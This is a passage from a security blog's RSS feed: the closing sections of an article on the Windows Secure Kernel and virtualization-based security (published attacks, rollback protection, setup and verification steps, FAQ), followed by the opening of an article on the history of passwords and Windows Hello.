&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory encryption&lt;/td&gt;
&lt;td&gt;No (isolation only)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (full VM)&lt;/td&gt;
&lt;td&gt;Yes (full VM)&lt;/td&gt;
&lt;td&gt;Varies&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Primary use case&lt;/td&gt;
&lt;td&gt;Desktop/server OS&lt;/td&gt;
&lt;td&gt;Legacy high-assurance&lt;/td&gt;
&lt;td&gt;Cloud confidential VMs&lt;/td&gt;
&lt;td&gt;Cloud confidential VMs&lt;/td&gt;
&lt;td&gt;Mobile/IoT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Status (2025)&lt;/td&gt;
&lt;td&gt;Active, expanding&lt;/td&gt;
&lt;td&gt;Deprecated on consumer&lt;/td&gt;
&lt;td&gt;GA on major clouds&lt;/td&gt;
&lt;td&gt;Rolling out&lt;/td&gt;
&lt;td&gt;Widely deployed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Known weakness&lt;/td&gt;
&lt;td&gt;Rollback, side-channels&lt;/td&gt;
&lt;td&gt;Foreshadow, deprecated&lt;/td&gt;
&lt;td&gt;Physical attacks&lt;/td&gt;
&lt;td&gt;Early deployment&lt;/td&gt;
&lt;td&gt;Firmware attacks&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Every platform bets on a different trust anchor. VBS trusts the hypervisor. SEV-SNP trusts only the CPU and its encryption keys. SGX trusted the CPU itself -- until side-channel attacks proved that wrong. The uncomfortable question follows: what &lt;em&gt;cannot&lt;/em&gt; VBS protect against?&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Limits: What VBS Cannot Protect Against&lt;/h2&gt;
&lt;p&gt;Every security boundary has an edge. VBS&apos;s edge is more nuanced than most defenders realize.&lt;/p&gt;
&lt;h3&gt;Attacking the Secure Kernel Directly&lt;/h3&gt;
&lt;p&gt;In August 2020, Saar Amar and Daniel King of Microsoft&apos;s own MSRC stood on the Black Hat stage and demonstrated something the community had feared: direct exploitation of securekernel.exe itself [@amar-bh2020]. Using a custom fuzzer called Hyperseed, they found the first five vulnerabilities in the secure call interface within two weeks; combined with continued manual auditing, they ultimately disclosed ten vulnerabilities [@amar-publications]. Memory corruption bugs in pool management and interface validation allowed VTL0 code to achieve code execution inside VTL1 -- breaking the isolation entirely.&lt;/p&gt;
&lt;p&gt;All vulnerabilities were patched before disclosure. Microsoft has since added mitigations: improved KASLR, Control Flow Guard (CFG) in VTL1, and stricter input validation. But the attack proved that VTL1 is not invulnerable -- the secure call interface is a real attack surface, and any bug there defeats all VBS guarantees.&lt;/p&gt;
&lt;h3&gt;Pass-the-Challenge: The Protocol-Level Bypass&lt;/h3&gt;
&lt;p&gt;Oliver Lyak&apos;s &quot;Pass-the-Challenge&quot; research revealed a subtle limitation of Credential Guard [@lyak-pass-the-challenge]. Credential Guard prevents credential &lt;em&gt;extraction&lt;/em&gt; -- but it cannot prevent credential &lt;em&gt;use&lt;/em&gt;. An attacker with SYSTEM access can relay NTLM authentication challenges through lsaiso.exe, using the machine as an &quot;NTLM oracle.&quot; The raw hash never leaves VTL1, but the attacker can still sign challenges on demand.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Credential Guard perfectly isolates secrets in VTL1, but the VTL0 broker (lsass.exe) necessarily provides an interface for using those secrets. Pass-the-Challenge exploits that interface -- not to extract secrets, but to relay them. This is a fundamental design tension: the more useful the isolation boundary, the more attack surface the boundary&apos;s API exposes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Side-Channel Attacks&lt;/h3&gt;
&lt;p&gt;Spectre and Meltdown demonstrated that speculative execution creates information leakage channels across any software-enforced boundary [@spectre-paper]. VTL0 and VTL1 share the same physical CPU, including caches, branch predictors, and TLBs. Microsoft has deployed microcode updates and software mitigations (IBRS, STIBP, retpolines) [@ms-spectre-advisory], but these reduce the risk rather than eliminating it. Complete elimination requires fundamentally different CPU designs that do not share microarchitectural state across trust boundaries.&lt;/p&gt;
&lt;h3&gt;The Formal Verification Gap&lt;/h3&gt;

The seL4 microkernel is formally verified -- mathematically proven correct for approximately 8,700 lines of C code [@sel4-whitepaper]. This means its isolation guarantees are not empirical (&quot;we tested it and found no bugs&quot;) but mathematical (&quot;we proved it cannot have certain classes of bugs&quot;). Hyper-V is orders of magnitude larger and more complex. Formally verifying it with current techniques is infeasible. The gap between &quot;extensively tested&quot; and &quot;mathematically proven&quot; is significant: Hyper-V&apos;s isolation is empirically strong, not provably correct. A single hypervisor bug could allow VTL escape.
&lt;h3&gt;Microsoft&apos;s Own Boundary&lt;/h3&gt;
&lt;p&gt;Microsoft explicitly states in its Security Servicing Criteria that an administrator with physical access is &lt;em&gt;not&lt;/em&gt; a security boundary [@ms-servicing-criteria]. VBS defends against remote kernel exploitation and privilege escalation, but not against an administrator who can modify firmware, attach hardware debuggers, or perform DMA or evil-maid-style physical attacks; Microsoft&apos;s VBS guidance separately calls out IOMMU-backed DMA protection as a distinct hardware requirement [@ms-vbs].&lt;/p&gt;
&lt;p&gt;This boundary declaration has practical consequences: it is why CVE-2024-21302 (Windows Downdate) required an opt-in fix rather than an automatic security update -- the attack requires admin privileges.&lt;/p&gt;
&lt;p&gt;VBS is the strongest runtime isolation Windows has ever had. But it is empirically strong, not mathematically proven. And one attack discovered in 2024 threatened to undo it entirely.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Arms Race: Rollback Attacks and the Ongoing Battle&lt;/h2&gt;
&lt;p&gt;In August 2024, Alon Leviev of SafeBreach Labs stood on the Black Hat stage and demonstrated something terrifying: he could silently roll back a &quot;fully patched&quot; Windows system to a state where all VBS protections were vulnerable -- using Windows Update itself.&lt;/p&gt;

I found several vulnerabilities that let me develop Windows Downdate -- a tool to take over the Windows Update process to craft fully undetectable downgrades. -- Alon Leviev, SafeBreach Labs
&lt;p&gt;The Windows Downdate attack (CVE-2024-21302) works by hijacking the Windows Update mechanism to replace current versions of securekernel.exe, ci.dll, and other VBS components with older, vulnerable versions [@leviev-downdate]. The system continues to report itself as &quot;fully patched&quot; while running code with known, exploitable vulnerabilities [@cve-2024-21302]. The attack requires administrator privileges -- which, as we noted, Microsoft does not consider a security boundary.&lt;/p&gt;

sequenceDiagram
    participant Attacker as Attacker (Admin in VTL0)
    participant WU as Windows Update
    participant FS as File System
    participant Boot as Next Boot
    Attacker-&amp;gt;&amp;gt;WU: Hijack update process
    WU-&amp;gt;&amp;gt;FS: Replace securekernel.exe with old version
    WU-&amp;gt;&amp;gt;FS: Replace ci.dll with old version
    Note over FS: System still reports &quot;fully patched&quot;
    FS-&amp;gt;&amp;gt;Boot: Boot with vulnerable binaries
    Boot-&amp;gt;&amp;gt;Boot: VBS runs with known vulnerabilities
    Note over Boot: All previously patched bugs are re-exposed
&lt;p&gt;Microsoft does not consider admin-to-kernel a security boundary, which is why CVE-2024-21302 required an &quot;opt-in&quot; fix rather than an automatic security update. Organizations must explicitly deploy KB5042562 to enable rollback protection.&lt;/p&gt;
&lt;p&gt;Microsoft responded with KB5042562, publishing a SkuSiPolicy.p7b revocation policy to block loading of outdated VBS-related binaries [@ms-rollback-guidance]. A UEFI variable lock reduces the risk of firmware-level rollback, though Leviev&apos;s research demonstrated it can be bypassed through Windows Update manipulation without physical access [@leviev-downdate-update]. But deployment is opt-in and complex -- applying it incorrectly can cause boot failures. And the underlying mechanism (admin-level control over the update process) remains exploitable [@leviev-downdate-update].&lt;/p&gt;
&lt;p&gt;The weaponization of VBS itself followed shortly. At DEF CON 33 in August 2025, Akamai researchers demonstrated &quot;BYOVE&quot; (Bring Your Own Vulnerable Enclave) and &quot;Mirage&quot; -- techniques for running malware inside a VBS enclave, hidden from EDR and antimalware tools that cannot inspect VTL1 memory [@akamai-vbs-weaponization]. The very isolation that protects legitimate secrets can also protect malicious code.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The same VTL1 isolation that makes VBS enclaves secure for legitimate applications makes them invisible to security tools. An attacker who can load a legitimately signed but vulnerable enclave DLL gains a hiding place that no VTL0 security product can inspect. Microsoft is actively hardening the enclave trust boundary [@ms-vbs-enclave-hardening], but the fundamental tension between isolation and visibility persists.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The pattern is clear: VBS raises the cost of attack, attackers find creative bypasses, Microsoft hardens further. The question is no longer &quot;is VBS breakable?&quot; but &quot;where does the research go next?&quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Open Questions: Where Research Is Heading&lt;/h2&gt;
&lt;p&gt;The Secure Kernel is mature but not finished. Five open problems define the next decade of research.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Complete rollback prevention.&lt;/strong&gt; KB5042562 is a start, but complete protection may require hardware-enforced monotonic version counters -- similar to ARM&apos;s anti-rollback fuse bits -- integrated into platform firmware [@ms-rollback-guidance]. Without hardware support, the administrator-who-controls-updates problem remains fundamentally unsolved.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Secure Kernel vulnerability discovery.&lt;/strong&gt; Jonathan Jagt&apos;s 2025 MSc thesis at Radboud University documented the process of setting up a Secure Kernel debugging environment and analyzed patched security bugs to identify vulnerability patterns [@jagt-thesis]. A key finding: the tooling for VTL1 research is scarce. Building a VTL1 debugging environment requires VMware-specific configurations and custom modifications that most researchers do not have access to. Better tooling would accelerate both offensive and defensive research.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;VBS Enclave security model.&lt;/strong&gt; The tension between protecting legitimate secrets and preventing malware evasion has no clean solution. Microsoft&apos;s hardening guidance addresses developer mistakes (TOCTOU races, pointer validation, reentrancy risks) [@ms-vbs-enclave-hardening], but the architectural problem -- that VTL1 isolation is equally useful to attackers and defenders -- requires a new approach to enclave attestation and monitoring.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Formal verification.&lt;/strong&gt; Can we ever prove Hyper-V correct? The seL4 proof covers approximately 8,700 lines of C [@sel4-whitepaper]. Hyper-V is hundreds of thousands of lines. Current verification technology cannot scale to that size. Partial verification of critical subsystems (the SLAT enforcement logic, the secure call dispatcher) might be feasible and would meaningfully reduce the trusted computing base.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Side-channel elimination.&lt;/strong&gt; Requires fundamentally different CPU designs. Current mitigations (microcode patches, partitioned caches, branch prediction barriers) reduce the leakage rate but cannot close the channel entirely while VTL0 and VTL1 share physical hardware [@spectre-paper]. Some academic designs propose physically separate execution units for different trust levels, but these are years from production.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The theoretically perfect system would combine: a formally verified hypervisor, hardware with no shared microarchitectural state between trust levels, a complete binary revocation mechanism preventing all rollback attacks, and zero performance overhead. Each requirement is individually infeasible today. The Secure Kernel is the best available approximation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Windows Secure Kernel is the most significant architectural change to Windows security since the NT reference monitor. It does not make Windows invulnerable -- no technology does. But it changed what &quot;kernel compromise&quot; means.&lt;/p&gt;

gantt
    title Windows Kernel Security Evolution
    dateFormat YYYY
    axisFormat %Y
    section Gen 0
    NT Kernel (flat trust)       :1993, 2005
    section Gen 1
    PatchGuard (KPP)             :2005, 2012
    KMCS (driver signing)        :2007, 2012
    DEP                          :2004, 2012
    ASLR                         :2007, 2012
    SMEP                         :2011, 2015
    section Gen 2
    UEFI Secure Boot             :2012, 2015
    Measured Boot + TPM           :2012, 2015
    section Gen 3
    VBS + Secure Kernel           :2015, 2026
    Credential Guard              :2015, 2026
    HVCI / Memory Integrity       :2015, 2026
    System Guard Attestation      :2018, 2026
    Secured-core PCs              :2019, 2026
    section Gen 3.5
    VBS Enclaves                  :2024, 2026
&lt;p&gt;Modern Windows runs all three generations simultaneously -- PatchGuard still watches for kernel tampering, Secure Boot still verifies the boot chain, and VBS adds hardware-enforced isolation on top. Newer defenses supplement rather than replace earlier ones.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;Theory is valuable; practice pays the bills. Here is how to enable, verify, and troubleshoot VBS on your systems.&lt;/p&gt;
&lt;h3&gt;Hardware Requirements&lt;/h3&gt;
&lt;p&gt;VBS requires: a 64-bit CPU with hardware virtualization (Intel VT-x or AMD-V), Second Level Address Translation (Intel EPT or AMD NPT), TPM 2.0, and UEFI firmware with Secure Boot [@ms-vbs]. For optimal HVCI performance, Intel Kaby Lake (7th Gen) or newer (for MBEC) or AMD Zen 2 or newer (for GMET) is recommended [@ms-hvci].&lt;/p&gt;
&lt;h3&gt;Enabling VBS&lt;/h3&gt;
&lt;p&gt;VBS can be enabled through:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Group Policy:&lt;/strong&gt; Computer Configuration &amp;gt; Administrative Templates &amp;gt; System &amp;gt; Device Guard &amp;gt; Turn On Virtualization Based Security&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Intune/MDM:&lt;/strong&gt; Use the DeviceGuard CSP or endpoint security policies&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Registry:&lt;/strong&gt; Set &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\EnableVirtualizationBasedSecurity&lt;/code&gt; to 1&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;HVCI/Memory Integrity can be enabled separately via Windows Security &amp;gt; Device Security &amp;gt; Core Isolation &amp;gt; Memory Integrity.&lt;/p&gt;
&lt;h3&gt;Verifying VBS Status&lt;/h3&gt;
&lt;p&gt;{`
// Simulates Get-CimInstance -ClassName Win32_DeviceGuard
// -Namespace root/Microsoft/Windows/DeviceGuard&lt;/p&gt;
&lt;p&gt;const vbsStatus = {
  VirtualizationBasedSecurityStatus: 2, // 0=Not enabled, 1=Enabled but not running, 2=Running
  RequiredSecurityProperties: [1, 2],   // 1=Hypervisor support, 2=Secure Boot
  AvailableSecurityProperties: [1, 2, 3, 5, 6], // What hardware supports
  SecurityServicesConfigured: [1, 2],   // 1=CredentialGuard, 2=HVCI
  SecurityServicesRunning: [1, 2],      // Which services are active
};&lt;/p&gt;
&lt;p&gt;const statusNames = { 0: &quot;Not enabled&quot;, 1: &quot;Enabled (not running)&quot;, 2: &quot;Running&quot; };
const serviceNames = { 1: &quot;Credential Guard&quot;, 2: &quot;HVCI / Memory Integrity&quot;, 3: &quot;System Guard&quot; };&lt;/p&gt;
&lt;p&gt;console.log(&quot;VBS Status:&quot;, statusNames[vbsStatus.VirtualizationBasedSecurityStatus]);
console.log(&quot;\nConfigured Security Services:&quot;);
vbsStatus.SecurityServicesConfigured.forEach(s =&amp;gt;
  console.log(&quot;  -&quot;, serviceNames[s] || &quot;Unknown (&quot; + s + &quot;)&quot;)
);
console.log(&quot;\nRunning Security Services:&quot;);
vbsStatus.SecurityServicesRunning.forEach(s =&amp;gt;
  console.log(&quot;  -&quot;, serviceNames[s] || &quot;Unknown (&quot; + s + &quot;)&quot;)
);
console.log(&quot;\nTo check on your system, run in PowerShell:&quot;);
console.log(&quot;Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root/Microsoft/Windows/DeviceGuard&quot;);
`}&lt;/p&gt;
&lt;p&gt;You can also verify VBS status via:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;msinfo32.exe:&lt;/strong&gt; Look for &quot;Virtualization-based security&quot; in the System Summary&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Windows Security app:&lt;/strong&gt; Device Security &amp;gt; Core Isolation details&lt;/li&gt;
&lt;/ul&gt;

**Driver compatibility:** Some older drivers violate W^X policy and fail to load with HVCI enabled. Check the Windows Event Log (CodeIntegrity events) for blocked drivers. Microsoft&apos;s Hardware Lab Kit (HLK) provides HVCI compatibility testing.&lt;p&gt;&lt;strong&gt;Performance impact:&lt;/strong&gt; VBS/HVCI adds roughly 5-10% overhead in CPU-bound workloads, especially gaming benchmarks [@vbs-perf]. On modern CPUs with MBEC/GMET, the overhead is lower. For gaming workloads, you may see reduced frame rates in CPU-bound scenarios.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Credential Guard and NLA:&lt;/strong&gt; Because Credential Guard blocks NTLM and the delegation of derived or saved credentials, RDP and Network Level Authentication flows that fall back to NTLM or rely on saved credentials can fail; prefer Kerberos and test interactive-logon and CredSSP-dependent workflows before broad rollout.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cannot enable VBS:&lt;/strong&gt; Verify that virtualization is enabled in BIOS/UEFI settings, Secure Boot is on, and TPM 2.0 is present and enabled. Some older systems lack SLAT support.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; 1. Open msinfo32.exe and confirm &quot;Virtualization-based security: Running&quot; 2. Check that &quot;Credential Guard&quot; and &quot;Hypervisor enforced Code Integrity&quot; appear under running services 3. Run &lt;code&gt;Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root/Microsoft/Windows/DeviceGuard&lt;/code&gt; in PowerShell for detailed status 4. Verify Secure Boot is enabled and TPM 2.0 is present&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Windows Secure Kernel is the most important Windows security feature most people have never heard of. It does not make the headlines that zero-days do. But it quietly changed the fundamental question of Windows security -- from &quot;can we keep attackers out of the kernel?&quot; to &quot;what can we protect even after they get in?&quot; The secrets behind the VTL1 wall remain safe. At least until the next chapter of the arms race.&lt;/p&gt;
&lt;hr /&gt;

VBS and HVCI add roughly 5-10% overhead in CPU-bound workloads, with gaming seeing the most noticeable impact [@vbs-perf]. For typical business usage (email, documents, web browsing), the impact is negligible. Modern CPUs with Intel MBEC (Kaby Lake / 7th Gen+) or AMD GMET (Zen 2+) significantly reduce this overhead through hardware-accelerated W^X enforcement.

No. securekernel.exe coexists with ntoskrnl.exe. The NT kernel handles all general OS operations -- process management, file systems, networking, device drivers. The Secure Kernel handles only security-critical functions: credential isolation, code integrity enforcement, enclave management. They run in parallel in separate VTLs.

No. VBS protects specific assets (credentials, code integrity, application secrets) from a compromised kernel. The NT kernel itself can still be exploited -- an attacker can still gain SYSTEM access, install rootkits in VTL0, and control the standard OS environment. What they cannot do is access VTL1-protected secrets or load unsigned kernel drivers (with HVCI enabled).

No. VBS uses the Hyper-V *hypervisor*, not traditional VMs. You can run VBS without creating any virtual machines. The hypervisor runs as a thin layer beneath both VTLs to enforce memory isolation. If you also use Hyper-V VMs, VBS coexists with them.

No. Credential Guard protects stored credentials (NTLM hashes, Kerberos TGTs) from extraction, but it does not eliminate the need for strong authentication. It does not protect against phishing, password reuse, or credential relay attacks (as demonstrated by Pass-the-Challenge [@lyak-pass-the-challenge]). Credential Guard is one layer in a defense-in-depth strategy.

Not without rebooting. And with Secure Boot and a UEFI lock, VBS cannot be easily disabled even across reboots. However, the Windows Downdate attack demonstrated that VBS *components* can be silently downgraded to vulnerable versions without disabling VBS itself [@leviev-downdate]. Deploying KB5042562 rollback protection mitigates this risk.

No. VBS creates isolated execution environments within a single OS instance, not separate VMs. VTL0 and VTL1 share the same OS, the same desktop, the same processes (with the exception of trustlets in VTL1). The isolation is at the memory level via SLAT, not at the OS level. It is more like having a secure safe inside your house than having two separate houses.
&lt;hr /&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;secure-kernel-windows&quot; keyTerms={[
  { term: &quot;VBS&quot;, definition: &quot;Virtualization-Based Security -- uses Hyper-V hypervisor to create hardware-isolated Virtual Trust Levels within a single OS instance&quot; },
  { term: &quot;VTL0&quot;, definition: &quot;Normal World -- where the standard NT kernel, drivers, and applications run&quot; },
  { term: &quot;VTL1&quot;, definition: &quot;Secure World -- where securekernel.exe and security-critical trustlets like lsaiso.exe run, isolated by SLAT&quot; },
  { term: &quot;SLAT&quot;, definition: &quot;Second Level Address Translation (Intel EPT / AMD NPT) -- hardware feature enabling hypervisor-enforced memory isolation between VTLs&quot; },
  { term: &quot;HVCI&quot;, definition: &quot;Hypervisor-Protected Code Integrity -- enforces W^X and code signing from VTL1&quot; },
  { term: &quot;Credential Guard&quot;, definition: &quot;VBS feature isolating NTLM hashes and Kerberos TGTs in VTL1 via lsaiso.exe&quot; },
  { term: &quot;BYOVD&quot;, definition: &quot;Bring Your Own Vulnerable Driver -- attack using signed-but-vulnerable drivers to bypass code signing&quot; },
  { term: &quot;PatchGuard&quot;, definition: &quot;Software-only kernel integrity monitor that runs at Ring 0 -- same level as attackers&quot; },
  { term: &quot;W^X&quot;, definition: &quot;Write XOR Execute -- memory policy preventing pages from being both writable and executable&quot; },
  { term: &quot;Trustlet&quot;, definition: &quot;A process running in VTL1 Isolated User Mode, protected from all VTL0 access&quot; }
]} questions={[
  { q: &quot;Why can&apos;t PatchGuard provide the same security guarantees as VBS?&quot;, a: &quot;PatchGuard runs at Ring 0 -- the same privilege level as the attackers it monitors. Any Ring 0 code can find and disable PatchGuard given sufficient effort. VBS uses the hypervisor (Ring -1) to enforce isolation from a higher privilege level.&quot; },
  { q: &quot;What is the fundamental difference between VBS and AMD SEV-SNP?&quot;, a: &quot;VBS trusts the hypervisor and uses it to protect OS components from a compromised kernel. SEV-SNP distrusts the hypervisor and encrypts VM memory to protect guests from a compromised hypervisor. They address different threat models.&quot; },
  { q: &quot;Why can&apos;t Credential Guard prevent Pass-the-Challenge attacks?&quot;, a: &quot;Credential Guard isolates raw credentials in VTL1 but must provide an interface for using them (via lsaiso.exe). Pass-the-Challenge relays authentication challenges through this interface without extracting the secret -- exploiting the necessary API rather than breaking the isolation.&quot; },
  { q: &quot;What would it take to formally verify Hyper-V&apos;s isolation guarantees?&quot;, a: &quot;seL4 was verified for approximately 8,700 lines of C. Hyper-V is hundreds of thousands of lines. Current formal verification tools cannot scale to this size. Partial verification of critical subsystems (SLAT enforcement, secure call dispatch) might be feasible.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>secure-kernel</category><category>virtualization-based-security</category><category>credential-guard</category><category>hvci</category><category>kernel-security</category><category>hypervisor</category><category>operating-systems</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>No Secrets to Steal: How Windows Hello Eliminated the Shared Secret</title><link>https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/</link><guid isPermaLink="true">https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/</guid><description>How Windows Hello replaced passwords with TPM-backed biometrics, survived a decade of attacks, and helped make passwordless the default.</description><pubDate>Tue, 28 Apr 2026 00:00:00 GMT</pubDate><content:encoded>
**Windows Hello replaces passwords with biometric authentication backed by hardware cryptography.** Your face or fingerprint unlocks a private key sealed inside a TPM chip -- no biometric data ever leaves your device, and no shared secret crosses the network. After a decade of enterprise growing pains and a cat-and-mouse security arms race, Microsoft made passwordless the default for new accounts in May 2025, with passkeys now achieving a 98% sign-in success rate. The password&apos;s 64-year reign is ending -- but open problems in biometric spoofing, credential portability, and quantum-resistant cryptography mean the replacement is still under construction.
&lt;h2&gt;Why Passwords Must Die&lt;/h2&gt;
&lt;p&gt;In 2024, Microsoft observed 7,000 password attacks every second [@ms-passkeys] -- more than double the rate from 2023. Picture this: a user types their carefully memorized 16-character password into what looks like a corporate login page. The page is a phishing replica. In under a second, that password -- the one they have been rotating every 90 days for three years -- belongs to someone else.&lt;/p&gt;

Microsoft observed 7,000 password attacks per second in 2024. The password Corbato invented as a quick fix in 1961 had become the single greatest attack surface in computing.
&lt;p&gt;The problem is not weak passwords. The problem is passwords themselves. They are shared secrets -- a piece of information that both you and the server know. Anything a server stores can be stolen. Anything you type can be intercepted. Anything you memorize can be phished. These are not implementation bugs. They are design properties.&lt;/p&gt;
&lt;p&gt;It was not supposed to be this way. In 1961, Fernando Corbato [@wiki-password] introduced computer passwords at MIT as a quick fix for multi-user mainframes. Users needed separate file spaces on the Compatible Time-Sharing System (CTSS), and a secret string was the simplest way to provide per-user isolation. It was a temporary measure for a specific engineering constraint.&lt;/p&gt;
&lt;p&gt;That temporary measure lasted 64 years.&lt;/p&gt;
&lt;p&gt;What if authentication did not require a secret at all? What if your face unlocked a cryptographic key -- and that key never left your device? That is the promise of Windows Hello. But the story of how we got here passes through a gelatin finger, a low-cost USB device, and a near-infrared camera that shattered assumptions about what &quot;secure&quot; really means.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Password&apos;s 64-Year Reign: A Brief History of Authentication Failure&lt;/h2&gt;
&lt;p&gt;In 1966, a software bug in MIT&apos;s CTSS printed the master password file to every user&apos;s terminal -- the first known password breach [@wiki-password].The 1966 CTSS incident was not a hack. A system administrator accidentally swapped the login message file with the master password file. Every user who logged in that day saw everyone else&apos;s password on screen.&lt;/p&gt;
&lt;p&gt;It was a sign of things to come. For the next six decades, every generation of authentication would solve one problem -- and reveal a deeper one.&lt;/p&gt;

gantt
    title Authentication Evolution
    dateFormat YYYY
    axisFormat %Y
    section Passwords
    Plaintext passwords on CTSS       :1961, 1979
    section Hashed
    UNIX crypt / hashed passwords     :1979, 1993
    section Network Auth
    NTLM challenge-response           :1993, 2000
    Kerberos / Windows AD             :2000, 2015
    section Biometrics
    Software biometrics via WBF       :2009, 2015
    section Windows Hello
    Hello + TPM asymmetric auth       :2015, 2021
    ESS + VBS + Cloud Trust           :2021, 2024
    Passkeys and passwordless default :2024, 2026
&lt;h3&gt;Generation 0: Plaintext passwords (1961)&lt;/h3&gt;
&lt;p&gt;Corbato&apos;s CTSS stored passwords in plaintext [@wiki-password] in a file accessible to administrators. The model was simple: the user enters a string, the system compares it to a stored copy, and access is granted on match. The key assumption -- that only the legitimate user knows the password -- held exactly as long as the system remained uncompromised. Which was about five years.&lt;/p&gt;
&lt;h3&gt;Generation 1: Hashed passwords (1970s)&lt;/h3&gt;
&lt;p&gt;The obvious fix: do not store passwords in plaintext. In 1979, Robert Morris and Ken Thompson published the design behind UNIX&apos;s &lt;code&gt;crypt()&lt;/code&gt; function [@wiki-crypt], a one-way hash based on a modified DES algorithm with a 12-bit salt. Even if an attacker stole the hash file, they could not directly read the passwords. They would have to try every possible password and compare hashes -- a brute-force attack.&lt;/p&gt;
&lt;p&gt;For a while, that was computationally infeasible. Then Moore&apos;s Law caught up. By the late 1990s, EFF&apos;s DES Cracker and distributed.net had reduced 56-bit DES keysearch to &lt;strong&gt;22 hours and 15 minutes&lt;/strong&gt; [@eff-des], making DES-based &lt;code&gt;crypt()&lt;/code&gt; increasingly untenable against well-funded attackers. Users also chose weak, predictable passwords, and attackers built rainbow tables that mapped common passwords to their hashes instantly.&lt;/p&gt;
&lt;p&gt;Windows made this worse. LAN Manager (LM) hashes [@ms-lm-hash] uppercased every password, limited them to 14 characters, and split them into two 7-byte halves hashed independently.The LM hash design was spectacularly bad. By splitting a 14-character password into two 7-character halves, it reduced the brute-force search space from 95^14 to 2 x 95^7 -- a reduction of over 34 trillion times. An attacker could crack each half separately.&lt;/p&gt;
&lt;p&gt;Rainbow tables could crack LM hashes in seconds. Microsoft eventually disabled LM hashing by default in Windows Vista, but the damage to enterprise networks had been done.&lt;/p&gt;
&lt;h3&gt;Generation 2: Network challenge-response (1990s)&lt;/h3&gt;
&lt;p&gt;The next insight: stop transmitting passwords over the network. NTLM [@ms-lm-hash] used a challenge-response protocol -- the server sends a random nonce, the client computes a response using the nonce and the password hash, and the server verifies the response. The password never crosses the wire.&lt;/p&gt;
&lt;p&gt;Kerberos [@ms-kerberos], adopted in Windows 2000, improved further with mutual authentication, time-limited tickets, and single sign-on. It was elegant protocol engineering.&lt;/p&gt;
&lt;p&gt;But the fundamental problem remained: shared secrets. NTLM was vulnerable to pass-the-hash attacks [@mitre-pth] -- an attacker who obtains the password hash can authenticate without ever knowing the password. Kerberos tickets could be stolen (Golden Ticket, Silver Ticket attacks). Both systems still depended on users choosing strong passwords, which they consistently failed to do.&lt;/p&gt;
&lt;h3&gt;Generation 3: First software biometrics (2000s)&lt;/h3&gt;
&lt;p&gt;By the early 2000s, fingerprint readers appeared on Windows laptops. The idea was appealing: replace &quot;something you know&quot; with &quot;something you are.&quot; No password to remember, no password to steal.&lt;/p&gt;
&lt;p&gt;Microsoft introduced the Windows Biometric Framework (WBF) [@ms-wbf] in Windows 7 (2009), standardizing the API and driver interface. Before WBF, each fingerprint reader vendor -- AuthenTec, Validity, UPEK -- shipped proprietary middleware that injected into the Windows logon process. The result was inconsistent security, driver conflicts, and no centralized management.&lt;/p&gt;
&lt;p&gt;But WBF solved the wrong problem. It standardized the API while leaving the security model unchanged: biometric templates stored with weak encryption in user-accessible files, matching running in OS user space, and no hardware isolation whatsoever.&lt;/p&gt;
&lt;p&gt;In 2002, Tsutomu Matsumoto at Yokohama National University demonstrated the &quot;gummy finger&quot; attack -- creating gelatin replicas of fingerprints that fooled approximately 80% of commercial readers [@gummy-finger]. The materials cost just a few dollars. Without liveness detection and hardware protection, biometrics were security theater.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The pattern was unmistakable.&lt;/strong&gt; Each generation protected a different layer -- plaintext storage, hash computation, network transmission, biometric convenience -- but each left the next layer exposed. By 2013, passwords were fundamentally broken, and software-only biometrics were not the answer. Then Apple proved something nobody expected.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Catalyst: How Touch ID Changed Everything&lt;/h2&gt;
